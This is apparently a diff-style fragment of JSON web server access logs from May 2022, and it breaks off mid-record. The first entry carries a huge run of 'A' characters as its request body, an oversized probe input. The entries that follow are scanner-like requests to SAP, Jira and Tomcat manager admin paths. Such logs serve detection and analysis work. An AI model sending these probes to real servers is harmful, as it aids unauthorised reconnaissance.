AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.035","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.048","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status 